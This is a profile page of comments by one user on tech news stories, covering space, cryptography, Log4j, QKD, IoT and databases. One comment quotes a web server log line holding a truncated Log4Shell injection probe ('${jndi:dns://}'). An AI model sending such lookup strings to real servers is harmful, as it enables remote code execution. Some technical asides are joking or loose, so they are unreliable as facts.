* Posts by Paul Uszak

59 posts • joined 20 Jan 2009


The James Webb Space Telescope has only gone and deployed its primary mirror

Paul Uszak

"A camera would be nothing be(sic) PR."

A. Does anyone remember the oxygen consumption of Apollo 14? What is the current main data transmission rate of Voyager 1? Can anyone imagine the shape of dust storms on Mars?

B. Does anyone remember Neil Armstrong climbing down the ladder onto the Moon? Have you ever witnessed a total solar eclipse? Have you ever witnessed a launch of the space shuttle?

Which excites you the most, A or B? PR is everything. Unfortunately scientists and engineers don’t really understand that. Science does not speak for itself. If the JWST didn’t have cameras, then put them on. Figure it out; it’s NASA. Hire an advertising firm. They did it for Apollo 11 which also didn’t need the additional complexity.

And this is what Musk, Bezos and Branson understand. This is why the Millau Viaduct is widely known as having been built by Norman Foster. This is why was Trump, and why he could serve another two terms.

I respectfully yet forcefully suggest that all science and engineering courses should include marketing components. Otherwise we’re all going to end up like Nebraska.

Secure boot for UK electric car chargers isn't mandatory until 2023 – but why the delay?

Paul Uszak

Re: Solution to car charger issues...

Tsk, tsk. Of course I was referring to the new pound coins. The ones with Bluetooth.

Paul Uszak
IT Angle

Solution to car charger issues...

Why not just put pound coins into the all mechanical machine? Like those little bubble gum dispensers. Then turn the silver handle to get the juice. Hack that. It could also dispense bubble gum for use whilst charging.

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching

Paul Uszak

I suggest that this is a manifestation of the open source movement, and I'm being nice (honest). It would take a lot to persuade a commercial vendor to include all this (unnecessary) stuff into a retail library. Time is money and there's probably little user demand for JNDI/RMI/LDAP features in logging.

But all commercial/managerial sense goes out of the window for most open source stuff. If you're doing it as an unpaid hobby, they why not? It's fun. Some might even consider it art. Anything goes if there's no market strategy (and there's no market). New features creep in unchecked as young developers 'play' with the latest cool thing, irrespective of whether there's any demand for them. Therein lies the RMI and the problem...

Paul Uszak

This is all very complicated and I don't understand it. A logging library needs JNDI, RMI and LDAP functionality? Beyond PRINT (message)? Maybe it's a joke. Very fortunately, I use JULI Commons and I've just found:-

GET /$%7Bjndi:dns:// HTTP/1.1" 404 878 "${jndi:dns://}

in my web server log file....

How to destroy expensive test kit: What does that button do?

Paul Uszak

Re: Expensive test equipment

Alternative networks? You mean police/FBI Stingers?

ESA's Mars Express picks up plaintive bleeps of China's Zhurong rover, adding much-needed comms redundancy

Paul Uszak

Faster than Plusnet then...

Another brick in the (kitchen) wall: Users report frozen 1st generation Google Home Hubs

Paul Uszak

Re: Why is Google not liable for damages?

With respect, bollocks.

Go on and try. Go to Curry's and try to take back your three year old TV that's now been bricked. Explain your consumer rights. Draw a diagram. Cause a scene. The Saturday girl will press the panic alarm, the police will be called. Then you might be tasered because that's the most convenient thing to do before lunch break. The police might use chemical weapons on you too. There were 492,000 recorded incidents where a police officer reported the use of force on an individual in England and Wales in the year to March. Argos is probably the same.

If it bricks, count yourself lucky that it was the device and not you. I'm referencing Jordan Walker-Brown who'll never walk again. Now about that TV...

Paul Uszak

Why is Google not liable for damages?

Isn't it time that legislation was passed to recover damages from the up-daters?

If you take your car to the garage for an MOT and it falls off the ramp and is damaged, the garage is liable. Same with services delivered to patients at a hospital. Surely Google/IT provider should be liable for damages too. Either fix the code, or if totally bricked replace it. This would force companies to test upgrades rather than have the end users do so.

I understand that software is a little different to hardware, but is it actually? Is it only different in the consumers' minds because they want us to think that way? Now extrapolate and go forward in time. I foresee all products having embedded software and network connectivity. What if all my beer cans get bricked due to a wonky ASDA.OS up-date and I can't remotely open them? I'd want pre-cooled replacements.

Perhaps the consumer needs a paradigm shift.

Product release cycles are killing the environment, techies tell British Computer Society

Paul Uszak

Complete waste of time.

:-( I can nullify every single argument anyone will ever make with one simple word: "Safety".

Think your phone is snooping on you? Hold my beer, says basic physics

Paul Uszak

Re: This is mildly terrifying

"If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him."

It had to happen: Microsoft's cloudy Windows 365 desktops are due to land next month

Paul Uszak

Re: So now

You've misunderstood the Book:-

A "new heaven" and "new earth" (Azure) replace the old heaven and old earth. There is no more suffering or death. (21:1–8) (no more need for patching).

God comes to dwell with humanity in the New Jerusalem. (21:2–8) (Bill walks amongst us/the poor, not in armoured helicopter).

Description of the New Jerusalem. (21:9–27) (Microsoft campus on Mars).

The River of Life and the Tree of Life appear for the healing of the nations and peoples. The curse of sin is ended. (22:1–5) (Linux is defeated and we are shown the way of the Cloud).

And in Conclusion:-

Bill's reassurance that Windows 12's coming is imminent. Final admonitions. (22:6–21)

Tim Cook: Sideloading is a disaster and proposed App Store reforms would harm user privacy and security

Paul Uszak

Re: It wouldn't be for people who like to tinker

Deleted by unpatriotic socialists who don't' respect the will of the people. This is why President Trump is endeavouring to curb the bigotry and censorship of big tech.

Paul Uszak

Re: It wouldn't be for people who like to tinker

>Firearms have the potential to hurt people and few other uses.

One of those uses is to enforce democracy.

Kaspersky Password Manager's random password generator was about as random as your wall clock

Paul Uszak


Oh dear. Rolling your own crypto :-(

Please read https://crypto.stackexchange.com/questions/43272/why-is-writing-your-own-encryption-discouraged .

Plus 6.1E15 is nothing. Sorry. Stick to the tried stuff, or try to use one time pads if security is of such concern. But for that you'll need access to a trusted TRNG. Which you'll have to build yourself. 100% un-breakability comes at a price.

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

ERNIE: It wasn't a differencing operation. It was simply amplifying the electrical noise on a QS92 regulating valve (http://www.r-type.org/exhib/aag0022.htm). That then gated a counter and the numbers popped out using:- https://i.stack.imgur.com/cHpf9.png.

TrueRND: I too have one :-( Not really happy with it. But please remember on what article we are commenting on/getting excited. There is a concept called computational indistinguishability. That means you cannot differentiate a pseudo random sequence from a truly random sequence, no matter how hard you try. It's just the maths/statistics. That applies to TrueRND too. That's why the only solution that provides 100% confidence is a self build.

But most don't care, so ignore my ranting and I've got the lawn to mow...

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

It's this easy, If you have batteries and a Zener diode:- http://www.reallyreallyrandom.com/zener/breadboard/

Just suck up the entropy with a microcontroller of your choice.

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Actually NIST doesn't. Not for crypto. That's a common fallacy. It's in the front matter, quoting from NIST 800-90b:-

"This publication has been developed by NIST in accordance with its statutory responsibilities under the [Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq.](https://www.congress.gov/113/plaws/publ283/PLAW-113publ283.pdf), Public Law (P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including minimum requirements for federal information systems, but such standards and guidelines shall not apply to national security systems without the express approval of appropriate federal officials exercising policy authority over such systems. "

Which says:-

"§ 3553. Authority and functions of the Director and the Secretary:-

‘‘(d) NATIONAL SECURITY SYSTEMS.—Except for the authorities and functions described in subsection (a)(5) and subsection (c), the authorities and functions of the Director and the Secretary under this section shall not apply to national security systems.

‘‘(e) DEPARTMENT OF DEFENSE AND INTELLIGENCE COMMUNITY SYSTEMS.—(1) The authorities of the Director described in para-graphs (1) and (2) of subsection (a) shall be delegated to the Sec-retary of Defense in the case of systems described in paragraph (2) and to the Director of National Intelligence in the case of systems described in paragraph (3). "

So, good enough for the people, but not (US) national security?

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Read you loud and clear. Some of us are already trying to do that:-


Quantum Key Distribution: Is it as secure as claimed and what can it offer the enterprise?

Paul Uszak

Re: So the whole point is?

Well I think that you'd have to be in the presence of the fibres. Perhaps you could tie a really tight knot that would choke off the internet. The keys wouldn't be able to get through if the knot radius was less than the diameter of standard cryptographic photons. Or use plumbers' freezing spray to really slow them down.

Paul Uszak

Re: So the whole point is?

Err, no. The system is quantum as it deals with the generation, transmission and measurement of photon polarizations. The point is (quoting from the BB84 paper, https://arxiv.org/pdf/2003.06557.pdf):-

"...when information is encoded in non-orthogonal quantum states, such as single photons with polarization directions 0, 45, 90, and 135 degrees, one obtains a communications channel whose transmissions in principle cannot be read or copied reliably by an eaves­dropper ignorant of certain key information used in forming the transmission. The eavesdropper cannot even gain partial information about such a transmission without altering it a random and uncontrollable way likely to be detected by the channel's legiti­mate users. "

So I can send you 'stuff' with 100% confidence that no one has read it.

Paul Uszak

Re: Abe Lincoln knew the truth about QKD.

Please don't conflate a self-serving political system and the industrial-military complex with a cryptographic protocol. The article was about the protocol. This is why these threads go off the rails.

If you have insight into how QKD is cryptographically flawed that the organisations I listed don't, please put up. Mathematical detail would be a bonus :-)

Paul Uszak

Re: my "QKD for managers"

Oh dear. You've gotten the concept upside down. Interception is irrelevant. The beauty of QKD is that it is ALL about identity. The identity management comes from the Observer Effect of quantum physics. Any photon that is observed changes state. That's fundamental to the Universe, and exempt from any hardware resource considerations.

A "true MITM" relay would introduce measurable bases errors at the rate of an additional 50%. When Alice and Bob compare their expected results, the attack is detected. That is QKD's raison d'etre. The original BB84 article is here: https://arxiv.org/pdf/2003.06557.pdf

And that's why everyone is getting QKDNs.

Paul Uszak

Abe Lincoln knew the truth about QKD.

He's attributed to have said "You can fool all the people some of the time and some of the people all the time, but you cannot fool all the people all the time."

But that's exactly what quantum deniers (QD) are espousing. Any relation to QA? The banks, the governments (https://spacenews.com/governments-ally-for-federated-quantum-encryption-satellite-network/), the universities, the militaries, Europe (https://spacenews.com/europe-picks-euroqci-satellite-quantum-communications-consortium/) are all going for QKDNs because they're secure when correctly implemented. They allow mathematically unbreakable one time pads to be distributed and used.

But of course they're all fools. We here know the truth, eh?

Paul Uszak

Re: my "QKD for managers"

And perhaps a more balanced answer: https://crypto.stackexchange.com/a/51364/23115.

Reiterating: The fundamental point is that you need to keep implementation distinct from protocol. AES-GCM is also pretty weak if the key is on a Post-it stuck to the monitor. As is RSA/DH if the random number generator is weak/subverted. Everyone should just calm down.

Mine's the one time pad over there...

23. 712. 3. 608. 45. 89. 11. 332. 841. 255. You want more? Cloudflare and pals are streaming 'em live from new RNG API

Paul Uszak

/dev/random ?

For those lucky enough to use Linux, there's always /dev/random for information theoretic secure random numbers. That will get you 10's of kbits/hr simply using your machine, and 20's of kbits/hr using PornHub. And there's /dev/urandom for infinite amounts of cryptographically secure numbers. We need education, not a lava lamp service...

It's nearly 2019, and your network can get pwned through an oscilloscope

Paul Uszak

The Rigol 1054 is one of the most popular scopes in the DIY space. It's brilliant for the price of ~£370. And it's wide open at the back too. No authentication at all, helped along with automatic DHCP so all one need do is to shove a network cable up it's ass and it's on line.

You get full remote control of the scope, as well as total access to the sampling data. So you can read the wave forms from my little circuits. Great! The real issue is that this is a powered and networked computer with no sign on whatsoever. It may already be the case that it can be made to execute code remotely, due to some bug in the LXI command interface. What if you then can load malware onto it via Ethernet? Could you simply brick it for a bit of fun, or use it as a clandestine staging post for further exploits? Stuxnet-LXI perchance?

My nightmare is that my oscilloscope might be taken over and connect with my on-line wine chiller...

RIP... almost: Brit high street gadget shack Maplin Electronics

Paul Uszak

Why are you all dissing Maplins?

I don't understand what everyone's on about. They're an excellent shop. Look, you can buy a drill - https://www.maplin.co.uk/p/maplin-18v-lithium-ion-cordless-drill-n29lk. Just where else could you get one of these fine electronic devices (with built in batteries)? Not Toys'R'Us eh? And it's in stock at my local store. Save me a trip to Argos that will...

SK Telecom makes light of random numbers for IoT applications

Paul Uszak

I'll be queuing to buy one if I can just prove that mine's not simply outputting SHA256[NSAKey || CPUId, time_t].

Why don't people secure their IoT gadgets? 'It's not my problem'

Paul Uszak

So In summary...

... it it better? Considering all the problems of connected devices, and all the advantages, are we better off? Consider this in the wider context. It provides jobs and entertainment. Some smart stuff is actually life saving / life enhancing for the disabled. And it helps the terrorists. Some smart stuff also kills terrorists. So...

[Personally, I don't think that we are holistically better off with the IoT but I'm getting old and grumpy.]

Google's driverless car: It'll just block our roads. It's the worst

Paul Uszak

The courts will decide

Google and technology will not decide the viability of driver less vehicles. The courts will. What happens when the first child jumping out into the road is killed? Cue the lawyers. It will go to trial and the courts will have to decide who the defendant(s) are. It's likely that they will just ban that type of vehicle as surely as Segways are banned in Europe.

BMW tried a similar "advancement" when they brought out that weird motorbike with a fully surround roll cage. The idea that you wear a safety harness and have a roll cage might mean that you don't have to wear a safety helmet, thus making a motorbike more appealing. Unfortunately, the law says that on all two wheeled vehicles the driver has to wear a helmet. The project was cancelled.

NASA quandary: Should Curiosity channel Fast and Furious for Martian dune-buggy jump?

Paul Uszak

Re: So, they landed it in a hole...

"NASA is really, really good at going slow and careful."

Tell that to the relatives of the Challenger crew.

Chinese Moon rover, lander duo wake up after two-week snooze

Paul Uszak

Empty wall..?

If you want to see a wall, go see the Basra wall at the Staffordshire, UK, Arboretum. It's not empty.

Scientists discover supervolcano trigger that could herald humanity's doom

Paul Uszak


I'm booking my trip to Mars now. Anyone know the phone number for Virgin?

Battlefield Earth ruled worst film EVER

Paul Uszak

Re: Slightly out of touch el reg readers?

I like a genuine elitist with strong convictions. Norwegian?

Paul Uszak

Slightly out of touch el reg readers?

I find it slightly odd that the list contains Avatar and Titanic as bad films. Isn't it the case that those two films are the two highest grossing films ever made? That means a lot of people paid to go see them. Have all of those people been fooled? And then those people went and bought dvds. Have all of those people been fooled all of the time?

Occam's Razor... Isn't it probably the case that the majority of el reg readers are a strange crowd instead?

UK.gov holds summit to stop satnav-driven smash-ups

Paul Uszak

Re: Remember the Blackadder gag about fitting wheels to a tomato ?

Reason you pay £70 for a download is that you're (as a group) happy to pay that. It's a luxury item and thus the price is totally unrelated to the cost. Marketing 101. Sorry.

Child abuse suspect won't be forced to decrypt hard drive

Paul Uszak

Other good news...

... is that this provides confirmation of the effectiveness of TrueCrypt. Presumably a lot of money has been spent on this case, so it (kinda) proves that the civilian authorities can't break the encryption. Don't know about the spooks in Langley though...

Microsoft cranks out Internet Explorer 10 preview

Paul Uszak

"...support emerging web standards not yet finished"

Oh dear. Degi vus. So we'll be back to supporting IE's take on standards that aren't quite standard. I thought that we were trying to get away from browser specific functionality. Can't they wait a bit till the standards are written in stone...

Google 'personalizes' one in five searches

Paul Uszak

Does it matter?

Exactly how effective can google be? Loads of people use automatic cookie deletion apps, so all that leaves is ip addresses and they change for most users...

NHS hurls iPhone into booze abuse fray

Paul Uszak

Drinking is just one of the options

If we live in a (quasi)democracy isn't it my choice how to go? I've chosen to drink myself to death rather than die of bowel cancer on a hospital trolley, be shot by the police as a (we didn't really check)suspected terrorist or spend my last five years being beaten by some prevert council care home worker, but too daffy to realise it...

Filesharing laws to hit websites and newsgroups too

Paul Uszak

It's not all doom and gloom...

Whilst it looks like you're guilty until proven innocent, and you'll be fighting large media companies, this will probably blow over when a "significant" disconnection tries to happen.

I occasionally use wifi hotspots, and they're run by large corporations like airports and pub chains. At some point one of these is then going to get disconnected (or threatened with it). I look forward the the fall out when some ISP cuts off HSBC. Or Weatherspoons. Or Parliament itself. Things will then clear up.

El Reg's LHC visit - Deleted Scenes

Paul Uszak

Relativity 101 for dumbos

"Thought they were colliding at more like twice light speed (from our reference frame of course)"

Err, no. Two objects heading towards each other at the speed of light are still approaching at the speed of light relative to each other. You're kind of missing the whole idea of relativity...

US woman to drop sprog live on internet

Paul Uszak

Just nerds reading this?

Pretty biased commenting here eh? I'm just as frightened of the birth thing as the next geeknerd, but in the interests of fairness perhaps we should allow them(!) to express themselves.

Just as a matter of interest, has a female of the opposite sex ever posted on this site..?

Microsoft adds higher price to SQL Server's new features

Paul Uszak


You're joking, right? Are you really comparing Oracle Enterprise Edition with a MySQL knock-off? Name three international banks running Postgres...

ID Card scheme banking on 28 million volunteers

Paul Uszak

Luvly Goobly...

It makes me pleased to hear stuff like this. Crackpot public IT projects are just licences to print money for the IT suppliers. I can just imagine all the cancellation and loss of profits clauses being written into the current contracts.

I just wish I was still supplying the public sector - I need a holiday somewhere warm...

Sun's MySQL fork survival theory ripped

Paul Uszak

Mueller's got it wrong

I suspect that Mueller said what he said for other reasons. I think that Oracle are not out of the woods, although they may have thinned them out slightly.

A products 'brand' is not just it's name. You can easily change the name of the product and the product's reputation, performance, cost, placement remain. Witness Marathon > Snicker and Cloudscape > Derby. Both are well developed products that have not suffered simply because names have changed.

Also, remember who would drive the fight back. If the forked db were to be called DATABASE_637$, and maintained the current feature set, the techies who use it would not be fooled that the name had changed. They would see through the marketing. They saw through Vista's marketing to destroy that product, and everyone likes GIMP no matter how it sounds eh?

Oracle fails to convince MySQL doubters

Paul Uszak

@Anonymous Coward Posted Thursday 22nd October 2009 16:39 GMT

"I have never seen an enterprise product (BMC Remedy, HP OpenView, SAP, etc.) which uses MySQL or Oracle as it's underlying database"

Hmm, posted anonymously perhaps as you're from the flat text file school of databases? Some more experience (or reading) might help with this world view. I believe that there are one or two enterprise systems that run on Oracle. Also not sure if youtube, wikipedia and the weather channel count as enterprises but I think they run on MySQL.

Paul Uszak

It's not as bad as it could be...

One saving grace is that the source code is 'out there'. If Larry does lock down development, all the code showing how to do database things is available, and a forked public project becomes possible.

UK Border Agency suspends 'flawed' asylum DNA testing

Paul Uszak

Where does this lead?

Why not just measure the spacing of their eyes and the size of their heads? Oh hang on, that went pretty wrong...



Biting the hand that feeds IT © 1998–2022